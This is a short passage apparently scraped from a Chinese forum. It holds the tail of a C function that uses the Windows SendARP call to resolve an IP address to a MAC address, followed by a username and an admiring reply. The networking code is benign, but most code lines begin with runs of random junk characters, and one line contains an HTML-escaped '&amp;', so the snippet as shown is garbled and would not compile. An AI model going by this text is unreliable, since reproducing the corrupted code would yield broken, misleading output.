3 l) L# [% [% Y. k& A  DWORD  dwRet;
$ q- k* c6 f  l- I9 A6 C  ULONG  ulLen = 6, pulMac[2];
  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
0 T/ C* Y. L8 p4 c. _8 j  if(dwRet == NO_ERROR)
# \- _2 [7 V$ a; G7 Z( @  {
7 M7 w  X5 p3 ?  _- `    memcpy(pMAC, pulMac, 6);
' Y1 O3 y: h- F' w* `7 v    return TRUE;
9 i* T0 x( I. B  }
  h% q6 I, l5 l3 T  C# I, O  else return FALSE;
}

wy617958197

大侠好厉害啊